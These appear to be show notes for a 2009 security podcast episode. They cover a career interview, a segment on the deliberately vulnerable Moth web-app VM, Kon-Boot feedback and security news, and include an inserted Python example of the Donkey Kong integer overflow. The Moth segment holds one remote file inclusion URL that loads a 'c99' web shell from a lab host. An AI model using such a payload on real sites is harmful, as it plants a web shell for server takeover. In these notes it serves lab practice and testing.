Episode159

From Paul's Security Weekly

Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 159 - July 9th, 2009

  • NY Infraguard CTF - Two day Capture the Flag Event on July 21 - 22, 2009 at Cisco Systems, 1 Penn Plaza, 9th Floor. The event will be held from 9:00AM to 5:00 PM both days.
  • DEFCON - Look for our "vendor table" where we will be selling t-shirts in all colors and sizes for $10. Carlos will be giving a presentation on Meterpreter, and Larry will participate in the Defcon Poetry Jam with the tantalizing title of "FAIL". We will also be having an invite-only party, so stay tuned.
  • DEFCON Penthouse party in trouble. Paypal: Penthouse@siviak.org

Episode Media

mp3

Special Guest Interview With Lee Kushner & Mike Murray

Why Working On Your Career Is Becoming More and More Important to Success and Professional Satisfaction

  • Security is becoming more popular
  • Certification is a foundation – not an end game
  • Increasing Competition

Breaking In To The Information Security Profession

  1. Good knowledge – no experience – no job?
  2. How can you get started in the industry –
  3. Best ways to meet people –
  4. Build and establish credibility
  5. Turn your non infosec job into an infosec role
  6. What not to do

Upcoming InfoSecLeaders Podcast – “Breaking In to Information Security”

Hitting the Technical “Glass Ceiling”

Many people want to remain technical – but their earning potential is limited by this career choice.

  1. The reality of the situation – why it exists – what are the limitations
  2. How can you use your technical skills to advance in your current organizations
  3. Building other skills that complement your technical background
    1. Choose Which Skills To Develop
      1. Leading projects
      2. Communication – Written and Oral
  4. Recognizing which types of organizations value technical skills

Effective Career Planning

  1. Self Assessments
  2. Developing a Career Plan
  3. Setting Goals
  4. Building Brand/Network
  5. Choosing Strategic Career Investments
  6. Making Wise Career Choices

Resources

Tech Segment: PaulDotCom discusses Moth

I've tested several different vulnerable-on-purpose distributions over the past few months. From DVL to Mutillidae, they have all helped me test software and practice hacking. Moth is one of the best ones around for web application practice; it includes a gigantic amount of software and has been a proving ground for web app testing tools.

It was a bit tricky to get working; make sure you run this command (the original notes had the path typo "./sudo", the command is invoked through sudo):

$ sudo dpkg-reconfigure console-setup

The Moth VMware image is ready for download from the Bonsai - Information Security Services site.

There are three different ways to access the web applications and vulnerable scripts included in moth:

  1. Directly
  2. Through mod_security
  3. Through PHP-IDS (only if the web application is written in PHP)

Both mod_security and PHP-IDS have their default configurations and they show a log of the offending request when one is found. This is great because we can test our defensive measures too.

I used Nessus and easily found several vulnerabilities, including:

CGI Generic Remote File Inclusion Vulnerability

/w3af/audit/local_file_inclusion/trivial_lfi.php?file=http://192.168.1.26/c99.txt??

It also gave me a chance to test some RFI scripts; I found a good one on Packet Storm.

So go download Moth and play!

Tech Segment: Mick Douglas receives some feedback on Kon-Boot

Boy did we ever get feedback! Thanks for the interest!

The amazing news... this works from the USB! Thanks for the great work IronGeek! :-)

Again, Kon-Boot doesn't (yet) work against systems that have Full Disk Encryption (FDE). So get your folks to 'crypt those disks.

Stories For Discussion

  1. Open Information Security Foundation looks for the PDC community input! - [mikep] - The foundation has been DHS funded to build a new IDS/GPL IDS Engine, and they are looking for input from the InfoSec community.
  2. N. Korea attacks U.S. and South Korean government agencies for days - [mikep] - More FUD or 'proof' of a N. Korea cyberwar?
  3. ENISA Step by Step to setup a CSIRT - [Carlos] - ENISA is providing guidance on setting up an Incident Response Team
  4. MI6 Chief Revealed in Facebook - [Carlos] - Information can not only be leaked by a person, but friends and family can further expose more info for targeted attacks.
  5. Zero day in MSVIDCTL.DLL MSF - [Carlos] - 0 Day Exploit module for the new MS Video ActiveX flaw from Trancer added to Metasploit
  6. Farewell Milw0rm, Long live Milw0rm! - [Larry] - Yep, Milw0rm shuttered. Hopefully you got the latest archive. Where will we get 'sploits now? A big thanks to str0ke and company for all they have done over the years. Str0ke, if you are out there listening, how can the community help? [Carlos] - Milw0rm site is taken down and retired by owner, a great loss to the security community. UPDATE - [byte_bucket] - The future of Milw0rm seems unclear. Str0ke made the following two relevant posts on twitter: post #1"I have talked with a few friends and I'll be handing the site over so a group of people can add exploits / other things to the site. Hopefully it will be a new good start - str0ke" , post #2"milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there. - str0ke"
  7. Wordpress Vuln - [Larry] - Yeah, I know, Wordpress. But the fine folks at Core Security Technologies discovered that there are several issues with authentication bypass that allows folks to configure plugins, and include javascript. A last count via google was something like 1.5 million sites with the old vulnerable version...
  8. Google Chrome OS - [Larry] - I mean who cares? I CARE! Neat, yet another OS for us to secure, and....attack on pentests. I just see this as yet another opportunity for us as pentesters to be successful at compromising clients...if the track record of their browser carries over to their OS, this will be a cakewalk.
  9. ColdFusion - [Larry] - Nice. I know we don't cover ColdFusion often, but we should. Here's a nice couple of vulnerabilities in default modules that allow for file upload and XSS without authentication. Of course some defenses here allow the module to be configured to remove unused functionality, such as those affected...but are enabled by default. God forbid you copy the module in multiple locations.
  10. Holy Goldman Hacks! Er Sachs - [PaulDotCom] - This is scary. Why is it scary? Because all major financial institutions run software, and this software controls the global economy. Want proof? A programmer seriously affected how GS did in its trades by selling proprietary software to a competitor. He was picked up ASAP by the FBI. Yikes. Lots of talk about how to prevent this from happening. I don't think there is a good answer, other than pay your programmers a lot of money.
  11. Mystery of Donkey Kong Unbeatable level solved - [PaulDotCom] - turns out it was an integer overflow that ended the timer for the level before you could have a chance to finish. Neat!
  12. ActiveX 0Day in the wild - [PaulDotCom] - I first want to rant about the term remote. Remote has different meanings, like remote exploit for a service that does not require interaction, and one that does. There should be a distinguishing factor. And even further, tell us if the user has to click on something for it to work, other than the original web site you visited. Clear as mud huh?
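The Donkey Kong item above is a clean illustration of an 8-bit integer overflow, so here is an added worked example (not from the show notes, and not the game's code). It assumes the formula from the widely circulated analysis of the kill screen: the bonus timer is computed as (level + 4) * 10, held in a single byte, and capped at 80; those constants are taken as an assumption here, not from this page. The example contrasts the narrowing-then-capping order that wraps at level 22 with a version that caps before narrowing, which is the usual fix for this class of bug.

```python
BYTE_MASK = 0xFF   # one 8-bit register: arithmetic wraps modulo 256
TIMER_CAP = 80     # assumed cap on the bonus value (80 -> "8000" on screen)


def bonus_timer_8bit(level):
    """Bonus timer as an 8-bit implementation computes it (assumed formula).

    The product is stored into a byte *before* the cap is applied, so once
    (level + 4) * 10 exceeds 255 the stored value wraps and the cap never fires.
    """
    raw = ((level + 4) * 10) & BYTE_MASK
    return min(raw, TIMER_CAP)


def bonus_timer_checked(level):
    """Same formula, but cap in full-width arithmetic, then narrow.

    Raises OverflowError if the value to be stored still would not fit a byte,
    so a silent wrap can never reach the register.
    """
    capped = min((level + 4) * 10, TIMER_CAP)
    if not 0 <= capped <= BYTE_MASK:
        raise OverflowError(f"bonus {capped} does not fit in one byte")
    return capped


def first_wrapped_level(max_level=30):
    """First level at which the 8-bit result disagrees with the checked one."""
    for level in range(1, max_level + 1):
        if bonus_timer_8bit(level) != bonus_timer_checked(level):
            return level
    return None


if __name__ == "__main__":
    for level in range(18, 24):
        print(level, bonus_timer_8bit(level), bonus_timer_checked(level))
    print("first level with a wrapped timer:", first_wrapped_level())
```

At level 21 the product is 250, which fits in a byte and is capped to 80; at level 22 it is 260, which the byte stores as 4, and the cap leaves 4 alone. The checked version returns 80 for every level from 4 up because it compares before narrowing.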

Other Stories For Discussion

CompuServe is no more - [Mick] - I admit this shows my age, but I am fairly broken up by this. I had a great time using CompuServe and working for them/UUNet. Sigh, time marches on.